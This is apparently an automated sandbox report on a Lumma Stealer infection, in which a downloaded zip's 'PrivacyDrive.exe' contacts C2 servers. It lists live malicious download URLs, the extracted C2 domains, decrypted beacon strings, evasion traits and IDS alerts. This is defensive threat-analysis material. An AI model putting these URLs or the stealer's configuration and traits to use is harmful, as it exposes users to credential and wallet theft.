Edit tour

Windows Analysis Report
https://finalstepgo.com/uploads/il2.txt

Overview

General Information

Sample URL:	https://finalstepgo.com/uploads/il2.txt
Analysis ID:	1519577
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

C2 URLs / IPs found in malware configuration

Downloads suspicious files via Chrome

LummaC encrypted strings found

Sample uses string decryption to hide its real strings

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Detected potential crypto function

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Stores files to the Windows start menu directory

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64_ra

chrome.exe (PID: 6228 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)

chrome.exe (PID: 6452 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=1988,i,15395324966863303034,10377143304438437007,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)

chrome.exe (PID: 7124 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://finalstepgo.com/uploads/il2.txt" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)

rundll32.exe (PID: 2436 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)

PrivacyDrive.exe (PID: 364 cmdline: "C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe" MD5: 80C2A36E9A14E3EDBA0B706D2433D9B8)

WerFault.exe (PID: 2824 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 364 -s 1712 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/ https://censys.com/a-beginners-guide-to-hunting-open-directories/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["abortinoiwiam.shop", "racedsuitreow.shop", "covvercilverow.shop", "pumpkinkwquo.shop", "candleduseiwo.shop", "defenddsouneuw.shop", "priooozekw.shop", "deallyharvenw.shop", "surroundeocw.shop"], "Build id": "yJEcaG--rui1222"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000013.00000002.2000589436.0000000001010000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x5ad2f:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Suricata Signatures

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T17:42:09.309602+0200	2054653	1	A Network Trojan was detected	192.168.2.17	49738	172.67.206.221	443	TCP
2024-09-26T17:42:10.381763+0200	2054653	1	A Network Trojan was detected	192.168.2.17	49739	172.67.206.221	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T17:42:09.309602+0200	2049836	1	A Network Trojan was detected	192.168.2.17	49738	172.67.206.221	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T17:42:10.381763+0200	2049812	1	A Network Trojan was detected	192.168.2.17	49739	172.67.206.221	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (racedsuitreow .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T17:42:09.149185+0200	2056079	1	Domain Observed Used for C2 Detected	192.168.2.17	49738	172.67.206.221	443	TCP
2024-09-26T17:42:09.882537+0200	2056079	1	Domain Observed Used for C2 Detected	192.168.2.17	49739	172.67.206.221	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (racedsuitreow .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T17:42:08.667321+0200	2056078	1	Domain Observed Used for C2 Detected	192.168.2.17	54889	1.1.1.1	53	UDP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: https://finalstepgo.com/uploads/il2.txt

Avira URL Cloud: detection malicious, Label: malware

Antivirus detection for URL or domain

Source: https://finalstepgo.com/favicon.ico	Avira URL Cloud: Label: malware
Source: pumpkinkwquo.shop	Avira URL Cloud: Label: malware
Source: deallyharvenw.shop	Avira URL Cloud: Label: malware
Source: covvercilverow.shop	Avira URL Cloud: Label: malware
Source: https://finalstepgo.com/uploads/il222.zip	Avira URL Cloud: Label: malware
Source: abortinoiwiam.shop	Avira URL Cloud: Label: malware
Source: https://racedsuitreow.shop/apib	Avira URL Cloud: Label: malware
Source: defenddsouneuw.shop	Avira URL Cloud: Label: malware
Source: https://racedsuitreow.shop/w	Avira URL Cloud: Label: malware
Source: priooozekw.shop	Avira URL Cloud: Label: malware
Source: https://racedsuitreow.shop/	Avira URL Cloud: Label: malware
Source: surroundeocw.shop	Avira URL Cloud: Label: malware
Source: https://racedsuitreow.shop/api	Avira URL Cloud: Label: malware
Source: racedsuitreow.shop	Avira URL Cloud: Label: malware
Source: https://racedsuitreow.shop/_	Avira URL Cloud: Label: malware
Source: candleduseiwo.shop	Avira URL Cloud: Label: malware
Source: https://racedsuitreow.shop/api4	Avira URL Cloud: Label: malware
Source: https://racedsuitreow.shop/api6	Avira URL Cloud: Label: malware

Found malware configuration

Source: PrivacyDrive.exe.364.19.memstrmin

Malware Configuration Extractor: LummaC {"C2 url": ["abortinoiwiam.shop", "racedsuitreow.shop", "covvercilverow.shop", "pumpkinkwquo.shop", "candleduseiwo.shop", "defenddsouneuw.shop", "priooozekw.shop", "deallyharvenw.shop", "surroundeocw.shop"], "Build id": "yJEcaG--rui1222"}

Sample uses string decryption to hide its real strings

Source: 00000013.00000002.2000589436.0000000001010000.00000040.00001000.00020000.00000000.sdmp	String decryptor: covvercilverow.shop
Source: 00000013.00000002.2000589436.0000000001010000.00000040.00001000.00020000.00000000.sdmp	String decryptor: surroundeocw.shop
Source: 00000013.00000002.2000589436.0000000001010000.00000040.00001000.00020000.00000000.sdmp	String decryptor: abortinoiwiam.shop
Source: 00000013.00000002.2000589436.0000000001010000.00000040.00001000.00020000.00000000.sdmp	String decryptor: pumpkinkwquo.shop
Source: 00000013.00000002.2000589436.0000000001010000.00000040.00001000.00020000.00000000.sdmp	String decryptor: priooozekw.shop
Source: 00000013.00000002.2000589436.0000000001010000.00000040.00001000.00020000.00000000.sdmp	String decryptor: deallyharvenw.shop
Source: 00000013.00000002.2000589436.0000000001010000.00000040.00001000.00020000.00000000.sdmp	String decryptor: defenddsouneuw.shop
Source: 00000013.00000002.2000589436.0000000001010000.00000040.00001000.00020000.00000000.sdmp	String decryptor: racedsuitreow.shop
Source: 00000013.00000002.2000589436.0000000001010000.00000040.00001000.00020000.00000000.sdmp	String decryptor: candleduseiwo.shop
Source: 00000013.00000002.2000589436.0000000001010000.00000040.00001000.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000013.00000002.2000589436.0000000001010000.00000040.00001000.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000013.00000002.2000589436.0000000001010000.00000040.00001000.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000013.00000002.2000589436.0000000001010000.00000040.00001000.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000013.00000002.2000589436.0000000001010000.00000040.00001000.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000013.00000002.2000589436.0000000001010000.00000040.00001000.00020000.00000000.sdmp	String decryptor: yJEcaG--rui1222

Source: https://finalstepgo.com/uploads/il2.txt

HTTP Parser: No favicon

Source: unknown	HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.17:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.17:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.17:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.17:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.29.10:443 -> 192.168.2.17:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.23.209.181:443 -> 192.168.2.17:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.206.221:443 -> 192.168.2.17:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.206.221:443 -> 192.168.2.17:49739 version: TLS 1.2

Source:	Binary string: F:\PD3\bin\Release\PrivacyDrive.pdb source: PrivacyDrive.exe, 00000013.00000000.1876072666.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000013.00000003.1953924428.0000000005ABA000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: F:\PD3\bin\Release\PrivacyDrive.pdbN source: PrivacyDrive.exe, 00000013.00000000.1876072666.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000013.00000003.1953924428.0000000005ABA000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-54h]	19_2_01032132
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-18h]	19_2_0103D134
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-18h]	19_2_0103D0CE
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then movzx edx, byte ptr [ecx+eax]	19_2_010211B2
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	19_2_0102600C
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	19_2_01026013
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	19_2_01038312
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	19_2_0102539E
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	19_2_0105B3B2
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh	19_2_010563F2
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [ebx], al	19_2_01044215
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [ebx], al	19_2_01044215
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 1B788DCFh	19_2_01055272
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	19_2_0104C282
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [ebx], al	19_2_0104429B
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [ebx], al	19_2_0104429B
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	19_2_0105C2B2
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	19_2_010582BB
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	19_2_010512FC
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 77A9E0C4h	19_2_010512FC
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	19_2_0103F577
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov word ptr [eax], cx	19_2_01038582
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-54h]	19_2_010325AE
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esi+00000744h]	19_2_010445CB
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [edi], al	19_2_010445CB
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [ebx], al	19_2_010445CB
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-54h]	19_2_01032403
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then movzx ebp, word ptr [edi]	19_2_01050432
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov eax, 0000000Bh	19_2_010454B5
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+10h]	19_2_0101F4B2
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then cmp byte ptr [edi], 00000000h	19_2_010274E1
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then movzx edx, byte ptr [esi+ebx]	19_2_01017712
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	19_2_0104076F
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	19_2_0104076F
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov word ptr [eax], cx	19_2_0105B612
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], CECD21FDh	19_2_0103D652
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh	19_2_0103D652
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	19_2_0103A692
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	19_2_010166B2
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	19_2_0102F6C4
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	19_2_01022911
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov dword ptr [esp], 00000000h	19_2_0102C952
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	19_2_010259AB
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+28h]	19_2_010259AB
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then push ebx	19_2_0102F835
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	19_2_01059832
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 54CA534Eh	19_2_01059832
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov edi, ecx	19_2_010258A8
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then movzx eax, word ptr [esi+ecx]	19_2_01052B02
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [edi], al	19_2_01044B4C
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then jmp ecx	19_2_01050B62
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov edi, eax	19_2_01018B72
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then cmp word ptr [ebx+eax+02h], 0000h	19_2_01030B95
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov word ptr [esi], ax	19_2_01030B95
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h	19_2_0105BBE2
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then jmp eax	19_2_01027BF4
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then cmp byte ptr [edi], 00000000h	19_2_01027AF3
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	19_2_01058D52
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h	19_2_0105BD62
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-34h]	19_2_01035D92
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	19_2_01039DA7
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	19_2_01041DB2
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+08h]	19_2_01024DDD
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esi+20h]	19_2_01043F33
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esi+20h]	19_2_01043EB7
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	19_2_0105BFE2
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	19_2_01040E11
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [edi], al	19_2_01044E18
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	19_2_01054E22
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [edi], al	19_2_01044E2D
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov edi, dword ptr [ebp-3Ch]	19_2_0103FEC1
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esi+20h]	19_2_01043ED2
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 81105F7Ah	19_2_0105BED2
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov eax, ebp	19_2_0101BEE2
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov eax, ebp	19_2_0101BEE2
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	19_2_01050EF0
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then movzx edx, byte ptr [ecx+eax]	19_2_05A3F7B0
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h	19_2_05A7A1E0
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esi+20h]	19_2_05A624B5
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	19_2_05A7A5E0
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esi+20h]	19_2_05A62531
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov eax, ebp	19_2_05A3A4E0
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov eax, ebp	19_2_05A3A4E0
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	19_2_05A6F4EE
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov edi, dword ptr [ebp-3Ch]	19_2_05A5E4C2
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esi+20h]	19_2_05A624D0
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 81105F7Ah	19_2_05A7A4D0
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	19_2_05A73420
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [edi], al	19_2_05A6342B
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	19_2_05A5F40F
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [edi], al	19_2_05A63419
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-54h]	19_2_05A50730
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-18h]	19_2_05A5B732
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-18h]	19_2_05A5B6CC
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	19_2_05A4460A
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	19_2_05A44611
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then cmp word ptr [ebx+eax+02h], 0000h	19_2_05A4F193
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov word ptr [esi], ax	19_2_05A4F193
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then jmp eax	19_2_05A461F2
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then movzx eax, word ptr [esi+ecx]	19_2_05A71100
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then jmp ecx	19_2_05A6F160
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov edi, eax	19_2_05A37170
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [edi], al	19_2_05A6314A
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then cmp byte ptr [edi], 00000000h	19_2_05A460F1
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	19_2_05A583A5
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	19_2_05A603B0
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-34h]	19_2_05A54390
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+08h]	19_2_05A433DB
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h	19_2_05A7A360
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	19_2_05A77350
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then movzx edx, byte ptr [esi+ebx]	19_2_05A35D10
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	19_2_05A5ED6D
